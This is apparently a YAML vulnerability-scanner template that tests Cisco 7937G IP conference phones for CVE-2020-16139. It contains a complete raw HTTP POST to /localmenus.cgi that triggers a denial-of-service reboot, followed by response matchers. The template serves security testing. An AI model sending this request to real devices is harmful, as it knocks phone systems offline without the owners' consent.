29 lines
739 B
YAML
29 lines
739 B
YAML
id: cve-2020-16139
|
|
|
|
info:
|
|
name: Cisco 7937G Denial-of-Service Reboot Attack
|
|
author: pikpikcu
|
|
severity: low
|
|
|
|
# Refrence:-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/xml"
|
|
- type: word
|
|
words:
|
|
- 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
|